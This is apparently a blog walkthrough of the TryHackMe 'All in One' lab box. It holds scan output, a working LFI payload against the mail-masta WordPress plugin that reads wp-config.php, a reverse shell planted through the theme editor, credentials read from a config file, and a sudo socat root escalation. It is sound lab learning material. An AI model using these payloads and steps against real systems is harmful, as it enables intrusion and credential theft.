5 minutes
THM: All in One
Title:All in One
Description:This is a fun box where you will get to exploit the system in several ways. Few intended and unintended paths to getting user and root access.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.201.7 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 00:06 BST
Nmap scan report for 10.10.201.7
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.18.78
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f4:a7:b4:9d:64:9c:9d:59:ea:0a:9a:90:11:0f:2a:6c (RSA)
| 256 b7:58:1c:19:c0:de:e3:52:72:86:7e:d4:a1:ff:74:37 (ECDSA)
|_ 256 4c:a3:82:d0:09:04:8e:92:f8:a4:db:51:c2:44:31:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.22 seconds
Website
Visiting the site website we see just the standard apache holding page, so we run a gobuster scan.
# gobuster dir -u http://10.10.201.7 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.201.7
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 276]
/wordpress (Status: 301) [Size: 314] [--> http://10.10.201.7/wordpress/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Visiting the the wordpress directory we see a normal wordpress site, but nothing relevant, so we run a wpscan to check the plugins.
# wpscan --url http://10.10.201.7/wordpress/ -e u -e ap
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
...
...
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://10.10.201.7/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.201.7/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] reflex-gallery
| Location: http://10.10.201.7/wordpress/wp-content/plugins/reflex-gallery/
| Latest Version: 3.1.7 (up to date)
| Last Updated: 2021-03-10T02:38:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.201.7/wordpress/wp-content/plugins/reflex-gallery/readme.txt
...
...
Looking on exploit-db we see that the mail-masta plugin is vulnerable to Local File Inclusion (LFI). Using this we request the wp-config.php with the php filter encoding to base64.
http://10.10.201.7/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
After we have decoded this from base64 we have the database username and password. Checking these credentials on the wordpress admin login we can see that they have been reused and we can login.
Using the theme editor we can insert our own malicious PHP to get a reverse shell back. We put it into the 404 page so we can trigger it by visiting an non existing page.
Using this we get our shell.
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.201.7] 39812
Linux ip-10-10-201-7 5.15.0-138-generic #148~20.04.1-Ubuntu SMP Fri Mar 28 14:32:35 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
23:48:25 up 46 min, 0 users, load average: 0.00, 0.00, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Looking around the system we find an unusal file in the /etc/mysql/conf.d directory. Looking in reveals credentials.
$ ls /etc/mysql/conf.d/
mysql.cnf
mysqldump.cnf
private.txt
$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: **********
Using these creds we can login with SSH and get the user flag (after decoding it).
# ssh elyana@10.10.201.7
elyana@10.10.201.7's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-138-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat 23 Aug 2025 11:51:34 PM UTC
System load: 0.0 Processes: 162
Usage of /: 76.1% of 6.38GB Users logged in: 0
Memory usage: 24% IPv4 address for ens5: 10.10.201.7
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sat Aug 23 23:51:35 2025 from 10.11.18.78
elyana@ip-10-10-201-7:~$ cat user.txt
VE********************************************************59
elyana@ip-10-10-201-7:~$ cat user.txt | base64 -d
THM{49************************************sn}
Privilege escalation
Checing elyana’s sudo permissions we can see they have some.
elyana@ip-10-10-201-7:~$ sudo -l
Matching Defaults entries for elyana on ip-10-10-201-7:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elyana may run the following commands on ip-10-10-201-7:
(ALL) NOPASSWD: /usr/bin/socat
Looking for socat on GTFOBins We see there is a method we can use. Using this we get a root shell and can read the root flag.
elyana@ip-10-10-201-7:~$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
VE***********************************************************h9
cat /root/root.txt | base64 -d
THM{ue************************************i8}